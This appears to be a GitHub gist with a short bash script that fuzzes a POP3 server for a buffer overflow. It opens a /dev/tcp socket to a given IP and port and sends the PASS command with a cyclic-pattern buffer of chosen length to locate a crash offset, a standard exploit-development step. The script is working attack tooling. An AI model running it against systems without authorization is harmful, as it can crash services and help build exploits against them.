@natesubra
Last active December 28, 2016 20:22
Quick and dirty buffer overflow script using bash, tr, and printf
#!/bin/bash
# Quick and dirty buffer overflow fuzzing script (POP3 USER/PASS) using bash, tr, and printf
# 1st arg is ip, 2nd is port, 3rd is buffer size
# ex: ./bashfuzz.sh 10.0.0.1 110 2700
[[ -z "$1" ]] && { echo "Parameter 1 is empty (dest ip)" ; exit 1; }
[[ -z "$2" ]] && { echo "Parameter 2 is empty (dest port)" ; exit 1; }
[[ -z "$3" ]] && { echo "Parameter 3 is empty (buffer size)" ; exit 1; }
# different buffer options
# buffer="$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w "$3" | head -n 1)" # Random Buffer of $3 chars
# buffer="$(printf 'A%.0s' {1..$3})" # Does NOT work: brace expansion runs before $3 is expanded, so {1..$3} stays literal and only a single 'A' is printed
# buffer="$(head -c "$3" < /dev/zero | tr '\0' '\101')" # http://www.csgnetwork.com/asciiset.html - Octal code for chars (\101 = 'A')
buffer=""
# Patterned Buffer: concatenates unique 4-char chunks (a0A0, a0A1, ...) until the requested size is reached
for pattern in {a..z}{0..9}{A..Z}{0..9}; do
  buffer=$buffer$pattern
  [[ ${#buffer} -ge $3 ]] && break
done
buffer=${buffer:0:$3} # trim to exactly the requested size (the loop may overshoot by up to 3 chars)
exec 3<>"/dev/tcp/$1/$2" # Open Socket - http://xmodulo.com/tcp-udp-socket-bash-shell.html
printf 'USER test \r\n' >&3 # Send USER
timeout 1 cat <&3 # Read Response
printf 'PASS %s \r\n' "$buffer" >&3 # send PASS and BUFFER (buffer passed as an argument, not as the format string)
timeout 1 cat <&3 # Read Response
# Close Socket
exec 3<&-
exec 3>&-